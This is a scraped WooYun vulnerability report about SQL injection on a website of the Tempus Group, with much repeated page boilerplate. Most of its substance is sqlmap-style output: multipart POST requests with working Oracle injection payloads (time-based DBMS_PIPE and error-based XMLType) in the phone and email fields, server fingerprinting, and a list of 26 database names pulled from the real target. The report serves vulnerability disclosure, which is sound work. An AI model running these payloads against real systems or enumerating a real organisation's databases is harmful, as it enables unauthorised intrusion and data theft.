/wEPDwUKMTYxNDAzMTAwMw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYEAgMPEBYGHg1EYXRhVGV4dEZpZWxkBQxyZWNydWl0X25hbWUeDkRhdGFWYWx1ZUZpZWxkBQxyZWNydWl0X25hbWUeC18hRGF0YUJvdW5kZxAVBxJORVTkuK3nuqflt6XnqIvluIgY5Zu96ZmF5py656Wo6ZSA5ZSu5Luj6KGoD1RNQ+mUgOWUrue7j+eQhgnlh7rnpajlkZgTSkFWQeS4ree6p+W3peeoi+W4iBjmnLrnpajlm6LpmJ/plIDllK7kuJPlkZgY5py656Wo6L+Q5Lu35b2V5YWl5LiT5ZGYFQcSTkVU5Lit57qn5bel56iL5biIGOWbvemZheacuuelqOmUgOWUruS7o+ihqA9UTUPplIDllK7nu4/nkIYJ5Ye656Wo5ZGYE0pBVkHkuK3nuqflt6XnqIvluIgY5py656Wo5Zui6Zif6ZSA5ZSu5LiT5ZGYGOacuuelqOi/kOS7t+W9leWFpeS4k+WRmBQrAwdnZ2dnZ2dnZGQCDQ8PZBYCHghvbmNoYW5nZQXOAWlmKC9eLitcLihodG1sfHhsc3xkb2N8dHh0fGpwZ3wpJC9pLnRlc3QodGhpcy52YWx1ZS50b0xvd2VyQ2FzZSgpKSl7cmV0dXJuIHRydWU7fWVsc2Uge2FsZXJ0KCflr7nkuI3otbfvvIwg5LiK5Lyg55qE5qC85byP5LiN5Yy56YWN77yM6K+35LiK5LygaHRtbHxkb2N8dHh0fHhsc3xqcGfmoLzlvI/vvIEnKTt0aGlzLm91dGVySFRNTD10aGlzLm91dGVySFRNTDt9ZGQ09zXKk0A9Swb5f8dUoCYcFGGubA==
-----------------------------643024530396
Content-Disposition: form-data; name="names"
abc
-----------------------------643024530396
Content-Disposition: form-data; name="employment"
NET?D??1��3����|
-----------------------------643024530396
Content-Disposition: form-data; name="phone"
13122223333'||(SELECT 'Qppd' FROM DUAL WHERE 6183=6183 AND 6041=DBMS_PIPE.RECEIVE_MESSAGE(CHR(71)||CHR(81)||CHR(82)||CHR(65),5))||'
-----------------------------643024530396
Content-Disposition: form-data; name="phone1"
13112344321
-----------------------------643024530396
Content-Disposition: form-data; name="email"
[email protected]
-----------------------------643024530396
Content-Disposition: form-data; name="type"
0
-----------------------------643024530396
Content-Disposition: form-data; name="details"
asd
-----------------------------643024530396
Content-Disposition: form-data; name="uploadfile"; filename=""
Content-Type: application/octet-stream
-----------------------------643024530396
Content-Disposition: form-data; name="btnOk"
����???����Y
-----------------------------643024530396
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWCALkt+CtAgLeqs/kCwKqueeGAgKwgbuWDQKwgf+XDQKyzcaDDQLyv478DQL9kpmPAbomX9L3RIM5mcEynDzi1W4f8DaL
-----------------------------643024530396--
Parameter: MULTIPART email ((custom) POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: -----------------------------643024530396
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKMTYxNDAzMTAwMw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYEAgMPEBYGHg1EYXRhVGV4dEZpZWxkBQxyZWNydWl0X25hbWUeDkRhdGFWYWx1ZUZpZWxkBQxyZWNydWl0X25hbWUeC18hRGF0YUJvdW5kZxAVBxJORVTkuK3nuqflt6XnqIvluIgY5Zu96ZmF5py656Wo6ZSA5ZSu5Luj6KGoD1RNQ+mUgOWUrue7j+eQhgnlh7rnpajlkZgTSkFWQeS4ree6p+W3peeoi+W4iBjmnLrnpajlm6LpmJ/plIDllK7kuJPlkZgY5py656Wo6L+Q5Lu35b2V5YWl5LiT5ZGYFQcSTkVU5Lit57qn5bel56iL5biIGOWbvemZheacuuelqOmUgOWUruS7o+ihqA9UTUPplIDllK7nu4/nkIYJ5Ye656Wo5ZGYE0pBVkHkuK3nuqflt6XnqIvluIgY5py656Wo5Zui6Zif6ZSA5ZSu5LiT5ZGYGOacuuelqOi/kOS7t+W9leWFpeS4k+WRmBQrAwdnZ2dnZ2dnZGQCDQ8PZBYCHghvbmNoYW5nZQXOAWlmKC9eLitcLihodG1sfHhsc3xkb2N8dHh0fGpwZ3wpJC9pLnRlc3QodGhpcy52YWx1ZS50b0xvd2VyQ2FzZSgpKSl7cmV0dXJuIHRydWU7fWVsc2Uge2FsZXJ0KCflr7nkuI3otbfvvIwg5LiK5Lyg55qE5qC85byP5LiN5Yy56YWN77yM6K+35LiK5LygaHRtbHxkb2N8dHh0fHhsc3xqcGfmoLzlvI/vvIEnKTt0aGlzLm91dGVySFRNTD10aGlzLm91dGVySFRNTDt9ZGQ09zXKk0A9Swb5f8dUoCYcFGGubA==
-----------------------------643024530396
Content-Disposition: form-data; name="names"
abc
-----------------------------643024530396
Content-Disposition: form-data; name="employment"
NET?D??1��3����|
-----------------------------643024530396
Content-Disposition: form-data; name="phone"
13122223333
-----------------------------643024530396
Content-Disposition: form-data; name="phone1"
13112344321
-----------------------------643024530396
Content-Disposition: form-data; name="email"
[email protected]'||(SELECT 'UzxQ' FROM DUAL WHERE 2668=2668 AND 5905=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (5905=5905) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(122)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL))||'
-----------------------------643024530396
Content-Disposition: form-data; name="type"
0
-----------------------------643024530396
Content-Disposition: form-data; name="details"
asd
-----------------------------643024530396
Content-Disposition: form-data; name="uploadfile"; filename=""
Content-Type: application/octet-stream
-----------------------------643024530396
Content-Disposition: form-data; name="btnOk"
����???����Y
-----------------------------643024530396
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWCALkt+CtAgLeqs/kCwKqueeGAgKwgbuWDQKwgf+XDQKyzcaDDQLyv478DQL9kpmPAbomX9L3RIM5mcEynDzi1W4f8DaL
-----------------------------643024530396--
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: -----------------------------643024530396
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKMTYxNDAzMTAwMw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYEAgMPEBYGHg1EYXRhVGV4dEZpZWxkBQxyZWNydWl0X25hbWUeDkRhdGFWYWx1ZUZpZWxkBQxyZWNydWl0X25hbWUeC18hRGF0YUJvdW5kZxAVBxJORVTkuK3nuqflt6XnqIvluIgY5Zu96ZmF5py656Wo6ZSA5ZSu5Luj6KGoD1RNQ+mUgOWUrue7j+eQhgnlh7rnpajlkZgTSkFWQeS4ree6p+W3peeoi+W4iBjmnLrnpajlm6LpmJ/plIDllK7kuJPlkZgY5py656Wo6L+Q5Lu35b2V5YWl5LiT5ZGYFQcSTkVU5Lit57qn5bel56iL5biIGOWbvemZheacuuelqOmUgOWUruS7o+ihqA9UTUPplIDllK7nu4/nkIYJ5Ye656Wo5ZGYE0pBVkHkuK3nuqflt6XnqIvluIgY5py656Wo5Zui6Zif6ZSA5ZSu5LiT5ZGYGOacuuelqOi/kOS7t+W9leWFpeS4k+WRmBQrAwdnZ2dnZ2dnZGQCDQ8PZBYCHghvbmNoYW5nZQXOAWlmKC9eLitcLihodG1sfHhsc3xkb2N8dHh0fGpwZ3wpJC9pLnRlc3QodGhpcy52YWx1ZS50b0xvd2VyQ2FzZSgpKSl7cmV0dXJuIHRydWU7fWVsc2Uge2FsZXJ0KCflr7nkuI3otbfvvIwg5LiK5Lyg55qE5qC85byP5LiN5Yy56YWN77yM6K+35LiK5LygaHRtbHxkb2N8dHh0fHhsc3xqcGfmoLzlvI/vvIEnKTt0aGlzLm91dGVySFRNTD10aGlzLm91dGVySFRNTDt9ZGQ09zXKk0A9Swb5f8dUoCYcFGGubA==
-----------------------------643024530396
Content-Disposition: form-data; name="names"
abc
-----------------------------643024530396
Content-Disposition: form-data; name="employment"
NET?D??1��3����|
-----------------------------643024530396
Content-Disposition: form-data; name="phone"
13122223333
-----------------------------643024530396
Content-Disposition: form-data; name="phone1"
13112344321
-----------------------------643024530396
Content-Disposition: form-data; name="email"
[email protected]'||(SELECT 'RVVS' FROM DUAL WHERE 8308=8308 AND 5543=DBMS_PIPE.RECEIVE_MESSAGE(CHR(113)||CHR(116)||CHR(83)||CHR(70),5))||'
-----------------------------643024530396
Content-Disposition: form-data; name="type"
0
-----------------------------643024530396
Content-Disposition: form-data; name="details"
asd
-----------------------------643024530396
Content-Disposition: form-data; name="uploadfile"; filename=""
Content-Type: application/octet-stream
-----------------------------643024530396
Content-Disposition: form-data; name="btnOk"
����???����Y
-----------------------------643024530396
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWCALkt+CtAgLeqs/kCwKqueeGAgKwgbuWDQKwgf+XDQKyzcaDDQLyv478DQL9kpmPAbomX9L3RIM5mcEynDzi1W4f8DaL
-----------------------------643024530396--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
available databases [26]:
[*] ACCOUNT
[*] APEX_030200
[*] APPQOSSYS
[*] CPS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] INSURE
[*] JCPTJK
[*] MDSYS
[*] MOBILE
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] PMPF
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TPYBX
[*] WMSYS
[*] XDB
[*] ZHAOPIN

修复方案：

~~~

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-06-05 14:22

厂商回复：

感谢厂商以及白帽子的协助发现，我们已经安排人员处理中。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0117801

漏洞标题：腾邦国际某站多处SQL注入大量数据库DBA权限2

相关厂商：腾邦集团

漏洞作者：路人甲

提交时间：2015-06-03 09:11

修复时间：2015-07-20 14:22

公开时间：2015-07-20 14:22

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0117801

漏洞标题：腾邦国际某站多处SQL注入大量数据库DBA权限2

相关厂商：腾邦集团

漏洞作者： 路人甲

提交时间：2015-06-03 09:11

修复时间：2015-07-20 14:22

公开时间：2015-07-20 14:22

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0117801"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云